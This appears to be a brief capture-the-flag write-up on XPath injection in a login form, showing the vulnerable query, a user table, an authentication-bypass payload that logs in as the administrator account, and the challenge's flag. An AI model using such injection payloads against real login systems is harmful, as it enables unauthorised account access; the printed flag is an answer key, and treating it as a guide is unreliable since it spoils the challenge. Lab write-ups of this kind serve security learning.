← Back
XPath-injection-Authentication | Avishai’s CTF Writeups

Avishai's CTF Writeups

Yalla Balagan! A collection of my CTF writeups and solutions.

View on GitHub

This is the query:

string(//user[username/text()='input' and password/text()='input']/account/text())

And we also can see this table:

Members Username | Email | Account type —– | —– | —— Steve | steve@jobs.com | subscriber John | John@doe.org | administrator Eric | ric@ard.biz | subscriber

So, we’ll give this payload ' or username='John' or ' and the full query will be:

username=' or username='John' or '&password=a

FINAL

Flag: J41m3Qu4nD54Tr0nc